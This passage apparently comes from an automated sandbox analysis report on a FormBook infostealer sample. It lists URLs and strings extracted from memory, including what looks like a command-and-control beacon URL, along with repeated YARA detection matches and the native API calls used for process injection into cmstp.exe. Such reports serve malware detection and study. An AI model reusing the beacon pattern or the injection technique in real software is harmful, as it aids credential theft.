          Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpString found in binary or memory: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN
          Source: explorer.exe, 00000003.00000000.237042288.000000000F674000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpString found in binary or memory: http://www.physicalrobot.com
          Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpString found in binary or memory: http://www.physicalrobot.com/
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00418272 NtReadFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9560 NtWriteFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABA770 NtOpenThread,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00418272 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004181C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00418270 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004182F0 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00418272 NtReadFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00408C5B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B569
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041BD6A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041CEAF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B7B5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B420A8
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B090
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B428EC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4E824
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31002
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7F900
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B422AE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAEBB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3DBD2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B303DA
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B42B28
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8841F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3D466
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B425DD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A70D20
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B42D07
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B41D55
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B42EF7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A96E30
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3D616
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B41FF1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4DFCE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00408C5B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00408C60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B569
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041BD6A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00402D87
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00402D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AD466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B1D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B2D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E0D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B25DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04606E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AD616
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046BDFCE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046BE824
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B28EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B20A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EF900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FA2B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B22AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B2B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A03DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046ADBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00408C5B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00408C60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B569
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00402D87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00402D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041CEAF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B7B5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: String function: 00419F70 appears 36 times
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: String function: 00A7B150 appears 45 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 045EB150 appears 48 times
          Source: TazxfJHRhq.exe, 00000000.00000003.211457812.000000001F016000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
          Source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs TazxfJHRhq.exe
          Source: TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
          Source: TazxfJHRhq.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
